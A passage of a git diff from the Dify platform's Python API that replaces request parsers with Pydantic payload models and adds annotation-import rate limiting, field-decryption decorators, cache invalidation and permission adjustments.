InstalledAppCreatePayload.model_validate(console_ns.payload or {}) - recommended_app = db.session.query(RecommendedApp).where(RecommendedApp.app_id == args["app_id"]).first() + recommended_app = db.session.query(RecommendedApp).where(RecommendedApp.app_id == payload.app_id).first() if recommended_app is None: - raise NotFound("App not found") + raise NotFound("Recommended app not found") _, current_tenant_id = current_account_with_tenant() - app = db.session.query(App).where(App.id == args["app_id"]).first() + app = db.session.query(App).where(App.id == payload.app_id).first() if app is None: - raise NotFound("App not found") + raise NotFound("App entity not found") if not app.is_public: raise Forbidden("You can't install a non-public app") installed_app = ( db.session.query(InstalledApp) - .where(and_(InstalledApp.app_id == args["app_id"], InstalledApp.tenant_id == current_tenant_id)) + .where(and_(InstalledApp.app_id == payload.app_id, InstalledApp.tenant_id == current_tenant_id)) .first() ) @@ -133,7 +142,7 @@ class InstalledAppsListApi(Resource): recommended_app.install_count += 1 new_installed_app = InstalledApp( - app_id=args["app_id"], + app_id=payload.app_id, tenant_id=current_tenant_id, app_owner_tenant_id=app.tenant_id, is_pinned=False, @@ -163,12 +172,11 @@ class InstalledAppApi(InstalledAppResource): return {"result": "success", "message": "App uninstalled successfully"}, 204 def patch(self, installed_app): - parser = reqparse.RequestParser().add_argument("is_pinned", type=inputs.boolean) - args = parser.parse_args() + payload = InstalledAppUpdatePayload.model_validate(console_ns.payload or {}) commit_args = False - if "is_pinned" in args: - installed_app.is_pinned = args["is_pinned"] + if payload.is_pinned is not None: + installed_app.is_pinned = payload.is_pinned commit_args = True if commit_args: diff --git a/api/controllers/console/files.py b/api/controllers/console/files.py index fdd7c2f479..29417dc896 100644 --- a/api/controllers/console/files.py +++ b/api/controllers/console/files.py @@ -45,6 +45,9 @@ class FileApi(Resource): "video_file_size_limit": dify_config.UPLOAD_VIDEO_FILE_SIZE_LIMIT, "audio_file_size_limit": dify_config.UPLOAD_AUDIO_FILE_SIZE_LIMIT, "workflow_file_upload_limit": dify_config.WORKFLOW_FILE_UPLOAD_LIMIT, + "image_file_batch_limit": dify_config.IMAGE_FILE_BATCH_LIMIT, + "single_chunk_attachment_limit": dify_config.SINGLE_CHUNK_ATTACHMENT_LIMIT, + "attachment_image_file_size_limit": dify_config.ATTACHMENT_IMAGE_FILE_SIZE_LIMIT, }, 200 @setup_required diff --git a/api/controllers/console/tag/tags.py b/api/controllers/console/tag/tags.py index 17cfc3ff4b..e9fbb515e4 100644 --- a/api/controllers/console/tag/tags.py +++ b/api/controllers/console/tag/tags.py @@ -1,31 +1,40 @@ +from typing import Literal + from flask import request -from flask_restx import Resource, marshal_with, reqparse +from flask_restx import Resource, marshal_with +from pydantic import BaseModel, Field from werkzeug.exceptions import Forbidden +from controllers.common.schema import register_schema_models from controllers.console import console_ns from controllers.console.wraps import account_initialization_required, edit_permission_required, setup_required from fields.tag_fields import dataset_tag_fields from libs.login import current_account_with_tenant, login_required -from models.model import Tag from services.tag_service import TagService -def _validate_name(name): - if not name or len(name) < 1 or len(name) > 50: - raise ValueError("Name must be between 1 to 50 characters.") - return name +class TagBasePayload(BaseModel): + name: str = Field(description="Tag name", min_length=1, max_length=50) + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") -parser_tags = ( - reqparse.RequestParser() - .add_argument( - "name", - nullable=False, - required=True, - help="Name must be between 1 to 50 characters.", - type=_validate_name, - ) - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") +class TagBindingPayload(BaseModel): + tag_ids: list[str] = Field(description="Tag IDs to bind") + target_id: str = Field(description="Target ID to bind tags to") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +class TagBindingRemovePayload(BaseModel): + tag_id: str = Field(description="Tag ID to remove") + target_id: str = Field(description="Target ID to unbind tag from") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +register_schema_models( + console_ns, + TagBasePayload, + TagBindingPayload, + TagBindingRemovePayload, ) @@ -43,7 +52,7 @@ class TagListApi(Resource): return tags, 200 - @console_ns.expect(parser_tags) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -53,22 +62,17 @@ class TagListApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tags.parse_args() - tag = TagService.save_tags(args) + payload = TagBasePayload.model_validate(console_ns.payload or {}) + tag = TagService.save_tags(payload.model_dump()) response = {"id": tag.id, "name": tag.name, "type": tag.type, "binding_count": 0} return response, 200 -parser_tag_id = reqparse.RequestParser().add_argument( - "name", nullable=False, required=True, help="Name must be between 1 to 50 characters.", type=_validate_name -) - - @console_ns.route("/tags/") class TagUpdateDeleteApi(Resource): - @console_ns.expect(parser_tag_id) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -79,8 +83,8 @@ class TagUpdateDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tag_id.parse_args() - tag = TagService.update_tags(args, tag_id) + payload = TagBasePayload.model_validate(console_ns.payload or {}) + tag = TagService.update_tags(payload.model_dump(), tag_id) binding_count = TagService.get_tag_binding_count(tag_id) @@ -100,17 +104,9 @@ class TagUpdateDeleteApi(Resource): return 204 -parser_create = ( - reqparse.RequestParser() - .add_argument("tag_ids", type=list, nullable=False, required=True, location="json", help="Tag IDs is required.") - .add_argument("target_id", type=str, nullable=False, required=True, location="json", help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/create") class TagBindingCreateApi(Resource): - @console_ns.expect(parser_create) + @console_ns.expect(console_ns.models[TagBindingPayload.__name__]) @setup_required @login_required @account_initialization_required @@ -120,23 +116,15 @@ class TagBindingCreateApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_create.parse_args() - TagService.save_tag_binding(args) + payload = TagBindingPayload.model_validate(console_ns.payload or {}) + TagService.save_tag_binding(payload.model_dump()) return {"result": "success"}, 200 -parser_remove = ( - reqparse.RequestParser() - .add_argument("tag_id", type=str, nullable=False, required=True, help="Tag ID is required.") - .add_argument("target_id", type=str, nullable=False, required=True, help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/remove") class TagBindingDeleteApi(Resource): - @console_ns.expect(parser_remove) + @console_ns.expect(console_ns.models[TagBindingRemovePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -146,7 +134,7 @@ class TagBindingDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_remove.parse_args() - TagService.delete_tag_binding(args) + payload = TagBindingRemovePayload.model_validate(console_ns.payload or {}) + TagService.delete_tag_binding(payload.model_dump()) return {"result": "success"}, 200 diff --git a/api/controllers/console/workspace/models.py b/api/controllers/console/workspace/models.py index 246a869291..2def57ed7b 100644 --- a/api/controllers/console/workspace/models.py +++ b/api/controllers/console/workspace/models.py @@ -230,7 +230,7 @@ class ModelProviderModelApi(Resource): return {"result": "success"}, 200 - @console_ns.expect(console_ns.models[ParserDeleteModels.__name__], validate=True) + @console_ns.expect(console_ns.models[ParserDeleteModels.__name__]) @setup_required @login_required @is_admin_or_owner_required @@ -282,9 +282,10 @@ class ModelProviderModelCredentialApi(Resource): tenant_id=tenant_id, provider_name=provider ) else: - model_type = args.model_type + # Normalize model_type to the origin value stored in DB (e.g., "text-generation" for LLM) + normalized_model_type = args.model_type.to_origin_model_type() available_credentials = model_provider_service.provider_manager.get_provider_model_available_credentials( - tenant_id=tenant_id, provider_name=provider, model_type=model_type, model_name=args.model + tenant_id=tenant_id, provider_name=provider, model_type=normalized_model_type, model_name=args.model ) return jsonable_encoder( diff --git a/api/controllers/console/workspace/plugin.py b/api/controllers/console/workspace/plugin.py index c5624e0fc2..805058ba5a 100644 --- a/api/controllers/console/workspace/plugin.py +++ b/api/controllers/console/workspace/plugin.py @@ -46,8 +46,8 @@ class PluginDebuggingKeyApi(Resource): class ParserList(BaseModel): - page: int = Field(default=1) - page_size: int = Field(default=256) + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") reg(ParserList) @@ -106,8 +106,8 @@ class ParserPluginIdentifierQuery(BaseModel): class ParserTasks(BaseModel): - page: int - page_size: int + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") class ParserMarketplaceUpgrade(BaseModel): diff --git a/api/controllers/console/workspace/tool_providers.py b/api/controllers/console/workspace/tool_providers.py index 2c54aa5a20..a2fc45c29c 100644 --- a/api/controllers/console/workspace/tool_providers.py +++ b/api/controllers/console/workspace/tool_providers.py @@ -18,6 +18,7 @@ from controllers.console.wraps import ( setup_required, ) from core.entities.mcp_provider import MCPAuthentication, MCPConfiguration +from core.helper.tool_provider_cache import ToolProviderListCache from core.mcp.auth.auth_flow import auth, handle_callback from core.mcp.error import MCPAuthError, MCPError, MCPRefreshTokenError from core.mcp.mcp_client import MCPClient @@ -944,7 +945,7 @@ class ToolProviderMCPApi(Resource): configuration = MCPConfiguration.model_validate(args["configuration"]) authentication = MCPAuthentication.model_validate(args["authentication"]) if args["authentication"] else None - # Create provider + # Create provider in transaction with Session(db.engine) as session, session.begin(): service = MCPToolManageService(session=session) result = service.create_provider( @@ -960,7 +961,11 @@ class ToolProviderMCPApi(Resource): configuration=configuration, authentication=authentication, ) - return jsonable_encoder(result) + + # Invalidate cache AFTER transaction commits to avoid holding locks during Redis operations + ToolProviderListCache.invalidate_cache(tenant_id) + + return jsonable_encoder(result) @console_ns.expect(parser_mcp_put) @setup_required @@ -972,17 +977,23 @@ class ToolProviderMCPApi(Resource): authentication = MCPAuthentication.model_validate(args["authentication"]) if args["authentication"] else None _, current_tenant_id = current_account_with_tenant() - # Step 1: Validate server URL change if needed (includes URL format validation and network operation) - validation_result = None + # Step 1: Get provider data for URL validation (short-lived session, no network I/O) + validation_data = None with Session(db.engine) as session: service = MCPToolManageService(session=session) - validation_result = service.validate_server_url_change( - tenant_id=current_tenant_id, provider_id=args["provider_id"], new_server_url=args["server_url"] + validation_data = service.get_provider_for_url_validation( + tenant_id=current_tenant_id, provider_id=args["provider_id"] ) - # No need to check for errors here, exceptions will be raised directly + # Step 2: Perform URL validation with network I/O OUTSIDE of any database session + # This prevents holding database locks during potentially slow network operations + validation_result = MCPToolManageService.validate_server_url_standalone( + tenant_id=current_tenant_id, + new_server_url=args["server_url"], + validation_data=validation_data, + ) - # Step 2: Perform database update in a transaction + # Step 3: Perform database update in a transaction with Session(db.engine) as session, session.begin(): service = MCPToolManageService(session=session) service.update_provider( @@ -999,7 +1010,11 @@ class ToolProviderMCPApi(Resource): authentication=authentication, validation_result=validation_result, ) - return {"result": "success"} + + # Invalidate cache AFTER transaction commits to avoid holding locks during Redis operations + ToolProviderListCache.invalidate_cache(current_tenant_id) + + return {"result": "success"} @console_ns.expect(parser_mcp_delete) @setup_required @@ -1012,7 +1027,11 @@ class ToolProviderMCPApi(Resource): with Session(db.engine) as session, session.begin(): service = MCPToolManageService(session=session) service.delete_provider(tenant_id=current_tenant_id, provider_id=args["provider_id"]) - return {"result": "success"} + + # Invalidate cache AFTER transaction commits to avoid holding locks during Redis operations + ToolProviderListCache.invalidate_cache(current_tenant_id) + + return {"result": "success"} parser_auth = ( diff --git a/api/controllers/console/workspace/trigger_providers.py b/api/controllers/console/workspace/trigger_providers.py index 69281c6214..268473d6d1 100644 --- a/api/controllers/console/workspace/trigger_providers.py +++ b/api/controllers/console/workspace/trigger_providers.py @@ -22,7 +22,12 @@ from services.trigger.trigger_subscription_builder_service import TriggerSubscri from services.trigger.trigger_subscription_operator_service import TriggerSubscriptionOperatorService from .. import console_ns -from ..wraps import account_initialization_required, is_admin_or_owner_required, setup_required +from ..wraps import ( + account_initialization_required, + edit_permission_required, + is_admin_or_owner_required, + setup_required, +) logger = logging.getLogger(__name__) @@ -72,7 +77,7 @@ class TriggerProviderInfoApi(Resource): class TriggerSubscriptionListApi(Resource): @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def get(self, provider): """List all trigger subscriptions for the current tenant's provider""" @@ -104,7 +109,7 @@ class TriggerSubscriptionBuilderCreateApi(Resource): @console_ns.expect(parser) @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def post(self, provider): """Add a new subscription instance for a trigger provider""" @@ -133,6 +138,7 @@ class TriggerSubscriptionBuilderCreateApi(Resource): class TriggerSubscriptionBuilderGetApi(Resource): @setup_required @login_required + @edit_permission_required @account_initialization_required def get(self, provider, subscription_builder_id): """Get a subscription instance for a trigger provider""" @@ -155,7 +161,7 @@ class TriggerSubscriptionBuilderVerifyApi(Resource): @console_ns.expect(parser_api) @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def post(self, provider, subscription_builder_id): """Verify a subscription instance for a trigger provider""" @@ -200,6 +206,7 @@ class TriggerSubscriptionBuilderUpdateApi(Resource): @console_ns.expect(parser_update_api) @setup_required @login_required + @edit_permission_required @account_initialization_required def post(self, provider, subscription_builder_id): """Update a subscription instance for a trigger provider""" @@ -233,6 +240,7 @@ class TriggerSubscriptionBuilderUpdateApi(Resource): class TriggerSubscriptionBuilderLogsApi(Resource): @setup_required @login_required + @edit_permission_required @account_initialization_required def get(self, provider, subscription_builder_id): """Get the request logs for a subscription instance for a trigger provider""" @@ -255,7 +263,7 @@ class TriggerSubscriptionBuilderBuildApi(Resource): @console_ns.expect(parser_update_api) @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def post(self, provider, subscription_builder_id): """Build a subscription instance for a trigger provider""" diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..95fc006a12 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar from flask import abort, request from configs import dify_config +from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError from controllers.console.workspace.error import AccountNotInitializedError from enums.cloud_plan import CloudPlan from extensions.ext_database import db from extensions.ext_redis import redis_client +from libs.encryption import FieldEncryption from libs.login import current_account_with_tenant from models.account import AccountStatus from models.dataset import RateLimitLog @@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo P = ParamSpec("P") R = TypeVar("R") +# Field names for decryption +FIELD_NAME_PASSWORD = "password" +FIELD_NAME_CODE = "code" + +# Error messages for decryption failures +ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data" +ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code" + def account_initialization_required(view: Callable[P, R]): @wraps(view) @@ -331,3 +341,163 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated + + +def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None: + """ + Helper to decode a Base64 encoded field in the request payload. + + Args: + field_name: Name of the field to decode + error_class: Exception class to raise on decoding failure + error_message: Error message to include in the exception + """ + if not request or not request.is_json: + return + # Get the payload dict - it's cached and mutable + payload = request.get_json() + if not payload or field_name not in payload: + return + encoded_value = payload[field_name] + decoded_value = FieldEncryption.decrypt_field(encoded_value) + + # If decoding failed, raise error immediately + if decoded_value is None: + raise error_class(error_message) + + # Update payload dict in-place with decoded value + # Since payload is a mutable dict and get_json() returns the cached reference, + # modifying it will affect all subsequent accesses including console_ns.payload + payload[field_name] = decoded_value + + +def decrypt_password_field(view: Callable[P, R]): + """ + Decorator to decrypt password field in request payload. + + Automatically decrypts the 'password' field if encryption is enabled. + If decryption fails, raises AuthenticationFailedError. + + Usage: + @decrypt_password_field + def post(self): + args = LoginPayload.model_validate(console_ns.payload) + # args.password is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA) + return view(*args, **kwargs) + + return decorated + + +def decrypt_code_field(view: Callable[P, R]): + """ + Decorator to decrypt verification code field in request payload. + + Automatically decrypts the 'code' field if encryption is enabled. + If decryption fails, raises EmailCodeError. + + Usage: + @decrypt_code_field + def post(self): + args = EmailCodeLoginPayload.model_validate(console_ns.payload) + # args.code is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE) + return view(*args, **kwargs) + + return decorated diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index a037fe9254..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -4,7 +4,7 @@ from uuid import UUID from flask import request from flask_restx import Resource -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import BadRequest, InternalServerError, NotFound import services @@ -52,11 +52,26 @@ class ChatRequestPayload(BaseModel): query: str files: list[dict[str, Any]] | None = None response_mode: Literal["blocking", "streaming"] | None = None - conversation_id: UUID | None = None + conversation_id: str | None = Field(default=None, description="Conversation UUID") retriever_from: str = Field(default="dev") auto_generate_name: bool = Field(default=True, description="Auto generate conversation name") workflow_id: str | None = Field(default=None, description="Workflow ID for advanced chat") + @field_validator("conversation_id", mode="before") + @classmethod + def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: + """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + + if not value: + return None + + try: + return helper.uuid_value(value) + except ValueError as exc: + raise ValueError("conversation_id must be a valid UUID") from exc + register_schema_models(service_api_ns, CompletionRequestPayload, ChatRequestPayload) diff --git a/api/controllers/service_api/app/conversation.py b/api/controllers/service_api/app/conversation.py index 724ad3448d..be6d837032 100644 --- a/api/controllers/service_api/app/conversation.py +++ b/api/controllers/service_api/app/conversation.py @@ -4,7 +4,7 @@ from uuid import UUID from flask import request from flask_restx import Resource from flask_restx._http import HTTPStatus -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, model_validator from sqlalchemy.orm import Session from werkzeug.exceptions import BadRequest, NotFound @@ -37,9 +37,16 @@ class ConversationListQuery(BaseModel): class ConversationRenamePayload(BaseModel): - name: str = Field(description="New conversation name") + name: str | None = Field(default=None, description="New conversation name (required if auto_generate is false)") auto_generate: bool = Field(default=False, description="Auto-generate conversation name") + @model_validator(mode="after") + def validate_name_requirement(self): + if not self.auto_generate: + if self.name is None or not self.name.strip(): + raise ValueError("name is required when auto_generate is false") + return self + class ConversationVariablesQuery(BaseModel): last_id: UUID | None = Field(default=None, description="Last variable ID for pagination") diff --git a/api/controllers/service_api/dataset/dataset.py b/api/controllers/service_api/dataset/dataset.py index 7692aeed23..4f91f40c55 100644 --- a/api/controllers/service_api/dataset/dataset.py +++ b/api/controllers/service_api/dataset/dataset.py @@ -49,7 +49,7 @@ class DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: RetrievalModel | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None diff --git a/api/controllers/trigger/trigger.py b/api/controllers/trigger/trigger.py index e69b22d880..c10b94050c 100644 --- a/api/controllers/trigger/trigger.py +++ b/api/controllers/trigger/trigger.py @@ -33,7 +33,7 @@ def trigger_endpoint(endpoint_id: str): if response: break if not response: - logger.error("Endpoint not found for {endpoint_id}") + logger.info("Endpoint not found for %s", endpoint_id) return jsonify({"error": "Endpoint not found"}), 404 return response except ValueError as e: diff --git a/api/controllers/web/audio.py b/api/controllers/web/audio.py index b9fef48c4d..15828cc208 100644 --- a/api/controllers/web/audio.py +++ b/api/controllers/web/audio.py @@ -1,7 +1,8 @@ import logging from flask import request -from flask_restx import fields, marshal_with, reqparse +from flask_restx import fields, marshal_with +from pydantic import BaseModel, field_validator from werkzeug.exceptions import InternalServerError import services @@ -20,6 +21,7 @@ from controllers.web.error import ( from controllers.web.wraps import WebApiResource from core.errors.error import ModelCurrentlyNotSupportError, ProviderTokenNotInitError, QuotaExceededError from core.model_runtime.errors.invoke import InvokeError +from libs.helper import uuid_value from models.model import App from services.audio_service import AudioService from services.errors.audio import ( @@ -29,6 +31,25 @@ from services.errors.audio import ( UnsupportedAudioTypeServiceError, ) +from ..common.schema import register_schema_models + + +class TextToAudioPayload(BaseModel): + message_id: str | None = None + voice: str | None = None + text: str | None = None + streaming: bool | None = None + + @field_validator("message_id") + @classmethod + def validate_message_id(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, TextToAudioPayload) + logger = logging.getLogger(__name__) @@ -88,6 +109,7 @@ class AudioApi(WebApiResource): @web_ns.route("/text-to-audio") class TextApi(WebApiResource): + @web_ns.expect(web_ns.models[TextToAudioPayload.__name__]) @web_ns.doc("Text to Audio") @web_ns.doc(description="Convert text to audio using text-to-speech service.") @web_ns.doc( @@ -102,18 +124,11 @@ class TextApi(WebApiResource): def post(self, app_model: App, end_user): """Convert text to audio""" try: - parser = ( - reqparse.RequestParser() - .add_argument("message_id", type=str, required=False, location="json") - .add_argument("voice", type=str, location="json") - .add_argument("text", type=str, location="json") - .add_argument("streaming", type=bool, location="json") - ) - args = parser.parse_args() + payload = TextToAudioPayload.model_validate(web_ns.payload or {}) - message_id = args.get("message_id", None) - text = args.get("text", None) - voice = args.get("voice", None) + message_id = payload.message_id + text = payload.text + voice = payload.voice response = AudioService.transcript_tts( app_model=app_model, text=text, voice=voice, end_user=end_user.external_user_id, message_id=message_id ) diff --git a/api/controllers/web/completion.py b/api/controllers/web/completion.py index e8a4698375..a97d745471 100644 --- a/api/controllers/web/completion.py +++ b/api/controllers/web/completion.py @@ -1,9 +1,11 @@ import logging +from typing import Any, Literal -from flask_restx import reqparse +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import InternalServerError, NotFound import services +from controllers.common.schema import register_schema_models from controllers.web import web_ns from controllers.web.error import ( AppUnavailableError, @@ -34,25 +36,44 @@ from services.errors.llm import InvokeRateLimitError logger = logging.getLogger(__name__) +class CompletionMessagePayload(BaseModel): + inputs: dict[str, Any] = Field(description="Input variables for the completion") + query: str = Field(default="", description="Query text for completion") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + retriever_from: str = Field(default="web_app", description="Source of retriever") + + +class ChatMessagePayload(BaseModel): + inputs: dict[str, Any] = Field(description="Input variables for the chat") + query: str = Field(description="User query/message") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + conversation_id: str | None = Field(default=None, description="Conversation ID") + parent_message_id: str | None = Field(default=None, description="Parent message ID") + retriever_from: str = Field(default="web_app", description="Source of retriever") + + @field_validator("conversation_id", "parent_message_id") + @classmethod + def validate_uuid(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, CompletionMessagePayload, ChatMessagePayload) + + # define completion api for user @web_ns.route("/completion-messages") class CompletionApi(WebApiResource): @web_ns.doc("Create Completion Message") @web_ns.doc(description="Create a completion message for text generation applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the completion", "type": "object", "required": True}, - "query": {"description": "Query text for completion", "type": "string", "required": False}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[CompletionMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -67,18 +88,10 @@ class CompletionApi(WebApiResource): if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", type=dict, required=True, location="json") - .add_argument("query", type=str, location="json", default="") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("retriever_from", type=str, required=False, default="web_app", location="json") - ) + payload = CompletionMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: @@ -142,22 +155,7 @@ class CompletionStopApi(WebApiResource): class ChatApi(WebApiResource): @web_ns.doc("Create Chat Message") @web_ns.doc(description="Create a chat message for conversational applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the chat", "type": "object", "required": True}, - "query": {"description": "User query/message", "type": "string", "required": True}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "conversation_id": {"description": "Conversation UUID", "type": "string", "required": False}, - "parent_message_id": {"description": "Parent message UUID", "type": "string", "required": False}, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[ChatMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -173,20 +171,10 @@ class ChatApi(WebApiResource): if app_mode not in {AppMode.CHAT, AppMode.AGENT_CHAT, AppMode.ADVANCED_CHAT}: raise NotChatAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", type=dict, required=True, location="json") - .add_argument("query", type=str, required=True, location="json") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("conversation_id", type=uuid_value, location="json") - .add_argument("parent_message_id", type=uuid_value, required=False, location="json") - .add_argument("retriever_from", type=str, required=False, default="web_app", location="json") - ) + payload = ChatMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: diff --git a/api/core/app/app_config/entities.py b/api/core/app/app_config/entities.py index 93f2742599..307af3747c 100644 --- a/api/core/app/app_config/entities.py +++ b/api/core/app/app_config/entities.py @@ -1,3 +1,4 @@ +import json from collections.abc import Sequence from enum import StrEnum, auto from typing import Any, Literal @@ -120,7 +121,7 @@ class VariableEntity(BaseModel): allowed_file_types: Sequence[FileType] | None = Field(default_factory=list) allowed_file_extensions: Sequence[str] | None = Field(default_factory=list) allowed_file_upload_methods: Sequence[FileTransferMethod] | None = Field(default_factory=list) - json_schema: dict[str, Any] | None = Field(default=None) + json_schema: str | None = Field(default=None) @field_validator("description", mode="before") @classmethod @@ -134,11 +135,17 @@ class VariableEntity(BaseModel): @field_validator("json_schema") @classmethod 